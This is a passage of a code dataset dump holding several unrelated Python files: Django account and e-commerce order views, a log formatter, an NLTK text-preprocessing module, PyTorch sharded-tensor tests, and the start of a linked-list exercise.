'date_joined': request.user.date_joined,\n 'point': profile.point,\n 'portrait': profile.portrait,\n 'msg': msg,\n }\n )\n\n\n@login_required\ndef user_info(request, user):\n \"\"\"Show user info\"\"\"\n userinfo = User.objects.filter(username__iexact=user).get()\n article_no = Board.objects.filter(user__username__iexact=user).count()\n reply_no = Reply.objects.filter(user__username__iexact=user).count()\n\n return render(\n request,\n \"accounts/user_info.html\",\n {\n 'userinfo': userinfo,\n 'article_no': article_no,\n 'reply_no': reply_no,\n }\n )\n\n\n@login_required\ndef scrap_list(request, page=0):\n \"\"\"Show scrap list\"\"\"\n if int(page) < 1:\n return redirect('accounts:scrap_list', page=1)\n\n board_table = BoardTable()\n my_scrap = []\n name_list = board_table.get_table_list()\n list_count = board_table.get_list_count()\n\n current_page = int(page) - 1\n start_at = current_page * list_count\n end_at = start_at + list_count\n\n q = Q(status__iexact='1normal') | Q(status__iexact='4warning') \\\n | Q(status__iexact='3notice')\n\n scrap = request.user.profile.scrap.split(',')\n total = len(scrap)\n\n if request.user.profile.scrap != '':\n for index, s in enumerate(scrap[start_at:end_at]):\n app, id = s.split(':')\n if app == 'boards':\n item = Board.objects.filter(id__iexact=id).filter(q)\n if item.count():\n my_scrap.append([item[0]])\n else:\n continue\n\n index_total = int(ceil(float(total) / list_count))\n index_begin = int(current_page / 10) * 10 + 1\n index_end = mindex_end = index_total\n if index_end - index_begin >= 10:\n index_end = index_begin + 9\n mindex_begin = int(current_page / 5) * 5 + 1\n if mindex_end - mindex_begin >= 5:\n mindex_end = mindex_begin + 4\n\n return render(\n request,\n \"accounts/scrap.html\",\n {\n 'my_scrap': my_scrap,\n 'total': total,\n 'page': current_page + 1,\n 'index_begin': index_begin,\n 'index_end': index_end + 1,\n 'mindex_begin': mindex_begin,\n 'mindex_end': mindex_end + 1,\n 'index_total': index_total,\n 'name_list': name_list,\n }\n )\n\n\n@login_required\ndef delete_scrap(request, id):\n \"\"\"Delete selected scrap\"\"\"\n profile = request.user.profile\n app_id = 'boards:' + id\n regstr = re.escape(app_id) + r\"\\b(,|)\"\n profile.scrap = re.sub(regstr, '', profile.scrap)\n if profile.scrap and profile.scrap[-1] == ',':\n profile.scrap = profile.scrap[:-1]\n\n request.user.profile.save()\n return redirect('accounts:scrap_list_0')\n\n\n@login_required\ndef edit_bookmarks(request):\n \"\"\"Edit bookmarks\"\"\"\n my_bookmark = []\n if request.user.profile.bookmarks:\n bookmarks = request.user.profile.bookmarks.split(',')\n\n for bm in bookmarks:\n app, id = bm.split('-')\n if app == 'boards':\n app_table = BoardTable()\n elif app == 'teams':\n app_table = TeamTable()\n else:\n continue\n my_bookmark.append(\n [bm, app_table.get_table_name(id)]\n )\n\n return render(\n request,\n \"accounts/edit_bookmarks.html\",\n {\n 'my_bookmark': my_bookmark,\n }\n )\n\n\ndef sign_up(request):\n \"\"\"Sign up\"\"\"\n if request.method == \"POST\":\n userform = RegistrationForm(request.POST)\n if userform.is_valid():\n userform.save(commit=False)\n\n username = userform.cleaned_data['username']\n q = Q(username__iexact=username) | Q(first_name__iexact=username)\n if User.objects.filter(q).exists() or \\\n len(username) < settings.ID_MIN_LENGTH or \\\n len(username) > settings.ID_MAX_LENGTH:\n errormsg = _('Please check username.')\n return error_page(request, errormsg)\n\n if settings.ENABLE_NICKNAME:\n nick = userform.cleaned_data['first_name']\n if nick:\n q = Q(username__iexact=nick) | Q(first_name__iexact=nick)\n if User.objects.filter(q).exists() or \\\n len(nick) < settings.NICKNAME_MIN_LENGTH or \\\n len(nick) > settings.NICKNAME_MAX_LENGTH:\n errormsg = _('Please check nickname.')\n return error_page(request, errormsg)\n\n code = userform.cleaned_data['code']\n email = userform.cleaned_data['email']\n signer = TimestampSigner()\n\n try:\n value = signer.unsign(\n code, max_age=settings.VERIFICATION_CODE_VALID)\n code_check = value == email\n\n if code_check:\n userform.save()\n return render(\n request,\n \"accounts/join.html\",\n )\n else:\n errormsg = _('Verification failure. Please check verification code again.')\n except:\n errormsg = _('Verification failure. Please check verification code again.')\n else:\n errormsg = _('Sorry. Please try again later.')\n\n return error_page(request, errormsg)\n elif request.method == \"GET\":\n userform = RegistrationForm()\n\n return render(\n request,\n \"accounts/signup.html\",\n {\n 'userform': userform,\n }\n )\n\n\n@login_required\ndef show_deactivate_account(request):\n \"\"\"Show deactivate account page\"\"\"\n return render(\n request,\n \"accounts/deactivate_account.html\"\n )\n\n\n@login_required\ndef deactivate_account(request):\n \"\"\"Deactivate account\"\"\"\n if request.user.is_authenticated:\n request.user.is_active = False\n if request.user.is_staff:\n request.user.is_staff = False\n request.user.save()\n\n return redirect(reverse_lazy('accounts:logout'))\n\n\n@user_passes_test(lambda u: u.is_superuser)\ndef send_email(request):\n \"\"\"Send email to user for testing purpose\"\"\"\n id_email = request.user.email\n signer = TimestampSigner()\n value = signer.sign(id_email)\n subject = u'Test email.'\n body = u'keyCode: %s' % value\n\n try:\n send_mail(subject, body, settings.EMAIL_HOST_USER, [id_email], fail_silently=False)\n return error_page(request, \"Email sent\", status=201)\n except SMTPException:\n return error_page(request, \"Error!\")\n\n\n@staff_member_required\ndef dashboard_user(request, search_word='', condition='recent', page=1):\n \"\"\"Dashboard user\"\"\"\n list_count = settings.DASHBOARD_LIST_COUNT\n\n if int(page) < 1:\n return redirect('accounts:dashboard_user', condition, 1)\n\n if condition == 'recent':\n order = '-id'\n elif condition == 'point':\n order = '-profile__point'\n elif condition == 'login':\n order = '-last_login'\n elif condition == 'suspension':\n order = '-profile__suspension_till'\n elif condition != 'default':\n return error_page(request)\n\n current_page = int(page) - 1\n start_at = current_page * list_count\n end_at = start_at + list_count\n\n if search_word == '':\n q = Q()\n else:\n q = (Q(username__icontains=search_word) | Q(first_name__icontains=search_word)) | Q(email__icontains=search_word) | Q(profile__ip_list__icontains=search_word)\n\n total = User.objects.filter(q).count()\n if condition == 'default':\n users = User.objects.filter(q).order_by(\n '-is_superuser', '-is_staff', '-is_active', 'username')[\n start_at:end_at]\n elif condition == 'suspension':\n users = User.objects.filter(q).filter(is_active=False).order_by(\n order)[start_at:end_at]\n else:\n users = User.objects.filter(q).order_by(order)[start_at:end_at]\n\n index_total = int(ceil(float(total) / list_count))\n index_begin = int(current_page / 10) * 10 + 1\n index_end = mindex_end = index_total\n if index_end - index_begin >= 10:\n index_end = index_begin + 9\n mindex_begin = int(current_page / 5) * 5 + 1\n if mindex_end - mindex_begin >= 5:\n mindex_end = mindex_begin + 4\n\n return render(\n request,\n \"accounts/dashboard_user.html\",\n {\n 'users': users,\n 'total': total,\n 'page': current_page + 1,\n 'index_begin': index_begin,\n 'index_end': index_end + 1,\n 'mindex_begin': mindex_begin,\n 'mindex_end': mindex_end + 1,\n 'index_total': index_total,\n 'search_word': search_word,\n 'condition': condition,\n }\n )\n\n\n@staff_member_required\ndef suspension(request, user, days):\n \"\"\"Suspend user account for days\"\"\"\n sus_days = int(days)\n userinfo = User.objects.filter(username__iexact=user).get()\n\n if sus_days == 0 and not userinfo.is_active:\n userinfo.profile.suspension_till = timezone.now()\n userinfo.is_active = True\n userinfo.save()\n elif sus_days > 0:\n sus_until = timezone.now() + timezone.timedelta(days=sus_days)\n userinfo.profile.suspension_till = sus_until\n userinfo.is_active = False\n userinfo.save()\n\n sessions = UserSession.objects.filter(user=userinfo)\n for session in sessions:\n session.session.delete()\n\n return redirect('accounts:user_info', user)\n","repo_name":"genonfire/bbgo","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14645,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"} +{"seq_id":"7615214273","text":"import logging\n\nfrom .utils import string_color, read_1970_time\nfrom django.db import connection\nfrom django.conf import settings\n\nclass JsonPrettyFormatter:\n NO_PRINT = ['name', 'msg', 'args', 'levelname', 'levelno', 'pathname',\n 'filename', 'module', 'exc_info', 'exc_text', 'stack_info',\n 'lineno', 'funcName', 'created', 'msecs', 'relativeCreated',\n 'thread', 'threadName', 'processName', 'process']\n\n def format_default(self, record: logging.LogRecord) -> str:\n header = (f'【{record.levelname}】{read_1970_time(record.msecs)}\\n'\n f'rid: {record.__dict__[\"request_id\"]}\\n')\n for i in record.__dict__:\n if i not in self.NO_PRINT:\n header += f'{i}: {string_color(record.__dict__[i], \"white\")}\\n'\n return header\n\n def format_info(self, record: logging.LogRecord) -> str:\n record.__dict__['container_id'] = getattr(settings, 'CONTAINER_ID', '')\n if record.__dict__.get('category') == 'error':\n return (f'【错误】{read_1970_time(record.created)}\\n'\n f'rid: {record.__dict__[\"request_id\"]}\\n'\n f'uri: {record.__dict__[\"path\"]}\\n'\n f'{record.__dict__[\"method\"]}: {string_color(record.msg, \"cyan\")}\\n'\n f'-----EXCEPT BEGIN-----\\n'\n f'{string_color(record.__dict__[\"except\"], \"red\")}'\n f'-----EXCEPT END-----\\n')\n if record.__dict__.get('category') == 'response':\n if settings.DEBUG:\n record.__dict__['queries'] = len(connection.queries)\n return (f'【返回请求】{read_1970_time(record.created)}\\n'\n f'rid: {record.__dict__[\"request_id\"]} cost_timez: {record.__dict__[\"cost_timez\"]} queries: {record.__dict__.get(\"queries\")} \\n'\n f'uri: {record.__dict__[\"path\"]} client_ip: {record.__dict__.get(\"client_ip\")}\\n'\n f'{record.__dict__[\"method\"]}: {string_color(record.msg, \"cyan\")}\\n'\n f'response: {string_color(record.__dict__[\"response\"], \"green\")}\\n')\n if record.__dict__.get('category') == 'request':\n return (f'【发起请求】{read_1970_time(record.created)}\\n'\n f'rid: {record.__dict__[\"request_id\"]}\\n'\n f'uri: {record.__dict__[\"path\"]}\\n'\n f'{record.__dict__[\"method\"]}: {string_color(record.msg, \"cyan\")}\\n'\n f'response: {string_color(record.__dict__[\"response\"], \"blue\")}')\n return self.format_default(record)\n\n def format(self, record: logging.LogRecord) -> str:\n if record.levelname == 'INFO':\n return self.format_info(record)\n return self.format_default(record)\n","repo_name":"xzregg/djmyframework","sub_path":"djmyframework/framework/logformatter.py","file_name":"logformatter.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12654060589","text":"import string\nimport nltk\nfrom docx import Document\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import pos_tag\nimport os \nimport win32com.client\n\n# Download necessary datasets from NLTK\nnltk.download(\"averaged_perceptron_tagger\")\nnltk.download(\"punkt\")\nnltk.download(\"wordnet\")\nnltk.download(\"stopwords\")\n\n\n# Function to normalize and preprocess text\ndef normalize_text(text):\n # Tokenize the input text into individual words\n tokens = word_tokenize(text)\n\n # Convert all tokens to lowercase\n tokens = [w.lower() for w in tokens]\n\n # Create a translation table to remove punctuation\n table = str.maketrans(\"\", \"\", string.punctuation)\n\n # Remove punctuation from each token using the translation table\n stripped = [w.translate(table) for w in tokens]\n\n # Filter out tokens that are not alphabetic\n words = [word for word in stripped if word.isalpha()]\n\n # Define a set of English stopwords\n stop_words = set(stopwords.words(\"english\"))\n\n # Remove stopwords from the list of tokens\n words = [w for w in words if not w in stop_words]\n\n # Initialize an empty list to store lemmatized words\n lemmatized = []\n\n # Initialize the WordNet lemmatizer\n lemmatizer = WordNetLemmatizer()\n\n # Iterate over each word and its part-of-speech tag\n for word, tag in pos_tag(words):\n # Check the part-of-speech tag and lemmatize accordingly\n if tag.startswith(\"V\"): # Verb\n word = lemmatizer.lemmatize(word, \"v\")\n elif tag.startswith(\"J\"): # Adjective\n word = lemmatizer.lemmatize(word, \"a\")\n elif tag.startswith(\"N\"): # Noun\n word = lemmatizer.lemmatize(word, \"n\")\n elif tag.startswith(\"R\"): # Adverb\n word = lemmatizer.lemmatize(word, \"r\")\n\n # Append the lemmatized word to the list\n lemmatized.append(word)\n\n # Return the list of lemmatized words\n return lemmatized\n\n# Function to preprocess a document\ndef preprocess_document(file_path):\n # Extract the file extension using the os module\n file_extension = os.path.splitext(file_path)[1].lower()\n\n if file_extension == \".txt\":\n with open(file_path, \"r\") as file:\n content = file.read()\n elif file_extension == \".docx\":\n doc = Document(file_path)\n content = \" \".join([paragraph.text for paragraph in doc.paragraphs])\n elif file_extension == \".doc\":\n # Use win32com.client to extract text from .doc files\n word = win32com.client.Dispatch(\"Word.Application\")\n doc = word.Documents.Open(file_path)\n content = doc.Content.Text\n doc.Close()\n word.Quit()\n else:\n print(\"Unsupported file format\")\n return None\n\n # Preprocess the content using the normalize_text function\n preprocessed_text = normalize_text(content)\n return preprocessed_text\n","repo_name":"nourtheguy/IDPA-P1","sub_path":"python/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3235687144","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nfrom core import apiview_util\r\nfrom core import paginator\r\nfrom core.jsonresponse import JsonResponse, create_response\r\n\r\nfrom account.models import *\r\nfrom mall.models import *\r\nfrom modules.member.models import Member,MemberHasSocialAccount\r\nfrom mall import module_api as mall_api\r\nfrom tools.regional import views as regional_util\r\nfrom tools.express.util import *\r\nfrom market_tools.tools.weizoom_card.models import AccountHasWeizoomCardPermissions\r\nfrom webapp.modules.mall.templatetags.mall_filter import *\r\nfrom tools.express import util\r\n\r\norder_status2text = {\r\n\tORDER_STATUS_NOT: u'待支付',\r\n\tORDER_STATUS_CANCEL: u'已取消',\r\n\tORDER_STATUS_PAYED_SUCCESSED: u'已支付',\r\n\tORDER_STATUS_PAYED_NOT_SHIP: u'待发货',\r\n\tORDER_STATUS_PAYED_SHIPED: u'已发货',\r\n\tORDER_STATUS_SUCCESSED: u'已完成'\r\n}\r\nDEFAULT_CREATE_TIME = '2000-01-01 00:00:00'\r\ndef get_order_status_text(status):\r\n\treturn order_status2text[status]\r\n\r\n\r\ndef __data_format(datetime):\r\n\tif type(datetime) == unicode:\r\n\t\tdatetime = __parse_datetime_raw_string(datetime)\r\n\t# return str(datetime.strftime('%Y-%m-%d %H:%M:%S'))\r\n\tyear = datetime.strftime('%Y')\r\n\tmonth = datetime.strftime('%m')\r\n\tday = datetime.strftime('%d')\r\n\tmonth_day = '%s-%s-%s' % (year, month, day)\r\n\thour_minute = datetime.strftime('%H:%M:%S')\r\n\treturn '%s %s' % (month_day, hour_minute)\r\n\r\ndef _get_order_items(user, query, filter_value, sort_attr, query_string, count_per_page=15, cur_page=1):\r\n\twebapp_id = user.get_profile().webapp_id\r\n\torders = Order.objects.belong_to(webapp_id)\r\n\t# # 统计订单总数\r\n\t# order_total_count = _get_orders_total_count(orders)\r\n\t###################################################\r\n\t#处理搜索\r\n\tif query:\r\n\t\torders = orders.filter(order_id__icontains=query)\r\n\t###################################################\r\n\t# 处理筛选条件\r\n\tsource = None\r\n\tif filter_value and (filter_value != '-1'):\r\n\t\tparams, source_value = UserHasOrderFilter.get_filter_params_by_value(filter_value)\r\n\t\torders = orders.filter(**params)\r\n\t\tif source_value == 1:\r\n\t\t\tsource = 'weizoom_mall'\r\n\t\telif source_value == 0:\r\n\t\t\tsource = 'mine_mall'\r\n\t###################################################\r\n\t# if user.is_weizoom_mall:\r\n\t# \tweizoom_mall_order_ids = WeizoomMallHasOtherMallProductOrder.get_orders_weizoom_mall_for_other_mall(webapp_id)\r\n\t# else:\r\n\t# \tweizoom_mall_order_ids = WeizoomMallHasOtherMallProductOrder.get_order_ids_for(webapp_id)\r\n\r\n\tweizoom_orders = Order.by_webapp_id(webapp_id).filter(order_source=ORDER_SOURCE_WEISHOP)\r\n\tweizoom_mall_order_ids = [order.id for order in weizoom_orders]\r\n\r\n\torder_id_list = []\r\n\tif source:\r\n\t\tfor order in orders:\r\n\t\t\tif weizoom_mall_order_ids:\r\n\t\t\t\tif order.order_id in weizoom_mall_order_ids:\r\n\t\t\t\t\tif user.is_weizoom_mall:\r\n\t\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\t\telse:\r\n\t\t\t\t\torder.come = 'mine_mall'\r\n\t\t\telse:\r\n\t\t\t\torder.come = 'mine_mall'\r\n\t\t\tif source and order.come != source:\r\n\t\t\t\tcontinue\r\n\t\t\torder_id_list.append(order.id)\r\n\r\n\tif order_id_list:\r\n\t\torders = orders.filter(id__in=order_id_list)\r\n\t###################################################\r\n\t#处理排序\r\n\tif sort_attr != 'created_at':\r\n\t\torders = orders.order_by(sort_attr)\r\n\t###################################################\r\n\t#进行分页\r\n\tpageinfo, orders = paginator.paginate(orders, cur_page, count_per_page, query_string=query_string)\r\n\r\n\t#获取order对应的会员\r\n\twebapp_user_ids = set([order.webapp_user_id for order in orders])\r\n\twebappuser2member = Member.members_from_webapp_user_ids(webapp_user_ids)\r\n\r\n\t#获得order对应的商品数量\r\n\torder_ids = [order.id for order in orders]\r\n\r\n\torder2productcount = {}\r\n\tfor relation in OrderHasProduct.objects.filter(order_id__in=order_ids):\r\n\t\torder_id = relation.order_id\r\n\t\tif order_id in order2productcount:\r\n\t\t\torder2productcount[order_id] = order2productcount[order_id] + 1\r\n\t\telse:\r\n\t\t\torder2productcount[order_id] = 1\r\n\r\n\t#构造返回的order数据\r\n\titems = []\r\n\ttoday = datetime.today()\r\n\r\n\tfor order in orders:\r\n\t\t#获取order对应的member的显示名\r\n\t\tmember = webappuser2member.get(order.webapp_user_id, None)\r\n\t\tif member:\r\n\t\t\torder.buyer_name = member.username_for_html\r\n\t\t\torder.member_id = member.id\r\n\t\telse:\r\n\t\t\torder.buyer_name = u'未知'\r\n\t\t\torder.member_id = 0\r\n\r\n\t\tpayment_time = None\r\n\r\n\t\tif order.payment_time is None:\r\n\t\t\tpayment_time = ''\r\n\t\telif __data_format(order.payment_time) == DEFAULT_CREATE_TIME:\r\n\t\t\tpayment_time = ''\r\n\t\telse:\r\n\t\t\tpayment_time = __data_format(order.payment_time)\r\n\r\n\t\tif weizoom_mall_order_ids:\r\n\t\t\tif order.order_id in weizoom_mall_order_ids:\r\n\t\t\t\tif user.is_weizoom_mall:\r\n\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\t\telse:\r\n\t\t\t\t\torder.come = 'weizoom_mall'\r\n\t\t\telse:\r\n\t\t\t\torder.come = 'mine_mall'\r\n\t\telse:\r\n\t\t\torder.come = 'mine_mall'\r\n\t\tif source and order.come != source:\r\n\t\t\tcontinue\r\n\r\n\t\t# liupeiyu 该订单中的会员是否可点击\r\n\t\t# 来自本店的订单,会员不可点击\r\n\t\t# 或者改用户是 微众商城,会员都可点击\r\n\t\tif order.come is 'weizoom_mall' and user.is_weizoom_mall is False:\r\n\t\t\torder.member_id = 0\r\n\r\n\t\torder_id_list.append(order.id)\r\n\t\titems.append({\r\n\t\t\t'id': order.id,\r\n\t\t\t'order_id': order.order_id,\r\n\t\t\t'status': get_order_status_text(order.status),\r\n\t\t\t'total_price': '%.2f' % order.final_price,\r\n\t\t\t'ship_name': order.ship_name,\r\n\t\t\t'buyer_name': order.buyer_name,\r\n\t\t\t'pay_interface_name': PAYTYPE2NAME.get(order.pay_interface_type, u''),\r\n\t\t\t'created_at': __data_format(order.created_at),\r\n\t\t\t'product_count': order2productcount.get(order.id, 0),\r\n\t\t\t'customer_message': order.customer_message,\r\n\t\t\t'payment_time': payment_time,\r\n\t\t\t'come': order.come,\r\n\t\t\t'member_id': order.member_id,\r\n\t\t\t'type': order.type,\r\n\t\t\t'reason': order.reason\r\n\t\t})\r\n\treturn items, pageinfo\r\n\r\n#===============================================================================\r\n# get_order_list: 获取订单列表\r\n#===============================================================================\r\ndef get_order_list(request):\r\n\r\n\t#处理订单号的搜索\r\n\tquery = request.GET.get('query', None).strip()\r\n\r\n\t#处理订单状态筛选\r\n\tfilter_value = request.GET.get('filter_value', '-1')\r\n\r\n\t#进行分页\r\n\tcur_page = int(request.GET.get('cur_page', '1'))\r\n\tcount_per_page = int(request.GET.get('count', '10'))\r\n\r\n\tuser = request.user\r\n\tquery_string = request.META['QUERY_STRING']\r\n\tsort_attr = \"-created_at\"\r\n\r\n\titems, pageinfo = _get_order_items(user, query, filter_value, sort_attr, query_string, count_per_page, cur_page)\r\n\tif not items:\r\n\t\tresponse = create_response(500)\r\n\t\tresponse.errMsg = u'没有订单'\r\n\t\treturn response.get_jsonp_response(request)\r\n\tpage_json = JsonResponse()\r\n\tpage_json.has_next = paginator.to_dict(pageinfo)['has_next']\r\n\r\n\texisted_pay_interfaces = mall_api.get_pay_interfaces_by_user(user)\r\n\r\n\tis_weizoom_mall_partner = AccountHasWeizoomCardPermissions.is_can_use_weizoom_card_by_owner_id(request.user.id)\r\n\tif request.user.is_weizoom_mall:\r\n\t\tis_weizoom_mall_partner = False\r\n\tif is_weizoom_mall_partner or request.user.is_weizoom_mall:\r\n\t\tis_show_source = True\r\n\telse:\r\n\t\tis_show_source = False\r\n\tresponse = create_response(200)\r\n\tresponse.data = {\r\n\t\t'orders': items,\r\n\t\t'page_info': paginator.to_dict(pageinfo),\r\n\t\t'is_show_source': is_show_source,\r\n\t\t'existed_pay_interfaces' : existed_pay_interfaces,\r\n\t}\r\n\treturn response.get_jsonp_response(request)\r\n\r\n\r\n#===============================================================================\r\n# get_order: 获取订单详情\r\n#===============================================================================\r\ndef get_order(request):\r\n\tid = request.GET.get('id')\r\n\torder = Order.objects.get(id=id)\r\n\torder_has_products = OrderHasProduct.objects.filter(order=order)\r\n\r\n\tnumber = 0\r\n\tcur_order = JsonResponse()\r\n\tfor order_has_product in order_has_products :\r\n\t\tnumber += order_has_product.number\r\n\r\n\tcur_order.number = number\r\n\tcur_order.statu = get_order_status_text(order.status)\r\n\tcur_order.express_company_name = get_name_by_value(order.express_company_name)\r\n\tcur_order.type = order.type\r\n\tcur_order.express_number = order.express_number\r\n\tcur_order.leader_name = order.leader_name\r\n\tcur_order.integral = order.integral\r\n\tcur_order.bill_type = order.bill_type\r\n\tcur_order.bill = order.bill\r\n\tcur_order.order_id = order.order_id\r\n\tcur_order.final_price = '%.2f' % order.final_price\r\n\tcur_order.postage = '%.2f' % order.postage\r\n\tcur_order.ship_name = order.ship_name\r\n\tcur_order.ship_tel = order.ship_tel\r\n\tcur_order.area = regional_util.get_str_value_by_string_ids(order.area)\r\n\tcur_order.ship_address = order.ship_address\r\n\tcur_order.customer_message= order.customer_message\r\n\tcur_order.created_at = __data_format(order.created_at)\r\n\tcur_order.action = get_order_actions(order)\r\n\tcur_order.reason = order.reason\r\n\t#关联的优惠券\r\n\tcoupon = order.get_coupon()\r\n\tif coupon:\r\n\t\tcur_coupon = JsonResponse()\r\n\t\tcur_coupon.coupon_id = coupon.coupon_id\r\n\t\tcur_coupon.coupon_rule_name = coupon.coupon_rule.name\r\n\t\tcur_coupon.money = str(coupon.money)\r\n\t\tcur_order.coupon = cur_coupon\r\n\telse:\r\n\t\tcur_order.coupon = None\r\n\r\n\r\n\r\n\tproducts = mall_api.get_order_products(order)\r\n\t#商品\r\n\tcur_product_json = []\r\n\tfor product in products:\r\n\t\tcur_product = JsonResponse()\r\n\t\tcur_product.name = product['name']\r\n\t\tcur_product.count = product['count']\r\n\t\tcur_product.total_price = product['total_price']\r\n\t\tcur_product.thumbnails_url = product['thumbnails_url']\r\n\t\tcur_product.is_deleted = product['is_deleted']\r\n\t\tproperties = product['custom_model_properties']\r\n\t\tif properties:\r\n\t\t\tfor product_property in properties:\r\n\t\t\t\tcur_product.property_name = product_property['name']\r\n\t\t\t\tcur_product.property_value = product_property['property_value']\r\n\r\n\t\tcur_product_json.append(cur_product)\r\n\r\n\tresponse = create_response(200)\r\n\tresponse.data.order = cur_order\r\n\tresponse.data.products = cur_product_json\r\n\treturn response.get_jsonp_response(request)\r\n\r\n\r\n########################################################################\r\n# get_order_express_name: 获取物流快递名称\r\n########################################################################\r\ndef get_order_express_name(request):\r\n\texpress_name= util.get_express_company_json()\r\n\tresponse = create_response(200)\r\n\tresponse.data = express_name\r\n\treturn response.get_jsonp_response(request)\r\n\r\n\r\n########################################################################\r\n# add_express_info: 增加物流信息\r\n########################################################################\r\ndef add_express_info(request):\r\n\torder_id = request.GET['order_id']\r\n\texpress_company_name = request.GET['express_company_name']\r\n\texpress_number = request.GET['express_number']\r\n\tleader_name = request.GET['leader_name']\r\n\tis_update_express = request.GET['is_update_express']\r\n\tis_update_express = True if is_update_express == 'true' else False\r\n\tmall_api.ship_order(order_id, express_company_name, express_number, request.user.username, leader_name=leader_name, is_update_express=is_update_express)\r\n\r\n\tresponse = create_response(200)\r\n\tresponse.data.message=u'成功'\r\n\treturn response.get_jsonp_response(request)\r\n\r\n########################################################################\r\n# update_order_status: 更新订单状态\r\n########################################################################\r\ndef update_order_status(request):\r\n\torder_id = request.GET['order_id']\r\n\taction = request.GET['action']\r\n\torder = Order.objects.get(id=order_id)\r\n\r\n\tmall_api.update_order_status(request.user, action, order,request)\r\n\r\n\tresponse = create_response(200)\r\n\tresponse.data.message=u'成功'\r\n\treturn response.get_jsonp_response(request)","repo_name":"chengdg/weizoom","sub_path":"weapp/mobile_app/order_api_views.py","file_name":"order_api_views.py","file_ext":"py","file_size_in_byte":11743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"14820877109","text":"# Owner(s): [\"oncall: distributed\"]\n\nimport copy\n\nimport torch\nimport torch.distributed._shard.sharded_tensor as sharded_tensor\n\nfrom torch.distributed._shard.sharding_spec import (\n ChunkShardingSpec,\n)\nfrom torch.testing._internal.common_distributed import (\n requires_nccl,\n skip_if_lt_x_gpu,\n)\n\nfrom torch.testing._internal.distributed._shard.sharded_tensor import (\n TEST_GPU_NUM,\n ShardedTensorTestBase,\n with_comms,\n)\nfrom torch.testing._internal.common_utils import (\n run_tests,\n)\n\n\nclass TestTensorOps(ShardedTensorTestBase):\n @with_comms(init_rpc=False)\n @skip_if_lt_x_gpu(TEST_GPU_NUM)\n @requires_nccl()\n def test_deep_copy(self):\n spec = ChunkShardingSpec(\n dim=0,\n placements=[\n \"rank:0/cuda:0\",\n \"rank:1/cuda:1\",\n \"rank:2/cuda:2\",\n \"rank:3/cuda:3\",\n ],\n )\n st = sharded_tensor.rand(spec, (12, 5))\n copied_st = copy.deepcopy(st)\n self.assertTrue(type(copied_st) is type(st))\n self.assertEqual(copied_st.local_tensor(), st.local_tensor())\n self.assertFalse(copied_st is st)\n\n @with_comms(init_rpc=False)\n @skip_if_lt_x_gpu(TEST_GPU_NUM)\n @requires_nccl()\n def test_inplace_copy(self):\n spec = ChunkShardingSpec(\n dim=0,\n placements=[\n \"rank:0/cuda:0\",\n \"rank:1/cuda:1\",\n \"rank:2/cuda:2\",\n \"rank:3/cuda:3\",\n ],\n )\n st = sharded_tensor.rand(spec, (12, 5))\n ones_st = sharded_tensor.ones(spec, (12, 5))\n self.assertFalse(torch.equal(ones_st, st))\n st.copy_(ones_st)\n self.assertTrue(torch.equal(st, ones_st))\n\n # no grad inplace_copy should work between two with different requires_grad\n st_with_grad = sharded_tensor.rand(spec, (12, 5), requires_grad=True)\n self.assertTrue(st_with_grad.requires_grad)\n self.assertFalse(ones_st.requires_grad)\n with torch.no_grad():\n st_with_grad.copy_(ones_st)\n self.assertEqual(st_with_grad.local_tensor(), ones_st.local_tensor())\n\n @with_comms(init_rpc=False)\n @skip_if_lt_x_gpu(TEST_GPU_NUM)\n @requires_nccl()\n def test_clone(self):\n spec = ChunkShardingSpec(\n dim=0,\n placements=[\n \"rank:0/cuda:0\",\n \"rank:1/cuda:1\",\n \"rank:2/cuda:2\",\n \"rank:3/cuda:3\",\n ],\n )\n st = sharded_tensor.rand(spec, (12, 5))\n copied_st = st.clone()\n self.assertTrue(type(copied_st) is type(st))\n self.assertEqual(copied_st.local_tensor(), st.local_tensor())\n self.assertFalse(copied_st is st)\n\n @with_comms(init_rpc=False)\n @skip_if_lt_x_gpu(TEST_GPU_NUM)\n @requires_nccl()\n def test_detach(self):\n spec = ChunkShardingSpec(\n dim=0,\n placements=[\n \"rank:0/cuda:0\",\n \"rank:1/cuda:1\",\n \"rank:2/cuda:2\",\n \"rank:3/cuda:3\",\n ],\n )\n st = sharded_tensor.rand(spec, (12, 5), requires_grad=True)\n local_shards = st.local_shards()\n # before set requires_grad, all local shards should not require grads\n for local_shard in local_shards:\n self.assertTrue(local_shard.tensor.requires_grad)\n\n detached_st = st.detach()\n self.assertFalse(detached_st.requires_grad)\n\n for local_shard in detached_st.local_shards():\n self.assertFalse(local_shard.tensor.requires_grad)\n\n @with_comms(init_rpc=False)\n @skip_if_lt_x_gpu(TEST_GPU_NUM)\n @requires_nccl()\n def test_set_requires_grad(self):\n spec = ChunkShardingSpec(\n dim=0,\n placements=[\n \"rank:0/cuda:0\",\n \"rank:1/cuda:1\",\n \"rank:2/cuda:2\",\n \"rank:3/cuda:3\",\n ],\n )\n st = sharded_tensor.rand(spec, (12, 5))\n local_shards = st.local_shards()\n # before set requires_grad, all local shards should not require grads\n for local_shard in local_shards:\n self.assertFalse(local_shard.tensor.requires_grad)\n\n st.requires_grad_()\n self.assertTrue(st.requires_grad)\n\n for local_shard in local_shards:\n self.assertTrue(local_shard.tensor.requires_grad)\n\n\nif __name__ == \"__main__\":\n run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/distributed/_shard/sharded_tensor/ops/test_tensor_ops.py","file_name":"test_tensor_ops.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"17628707087","text":"'''\nGiven head, the head of a linked list, determine if the linked list has a cycle in 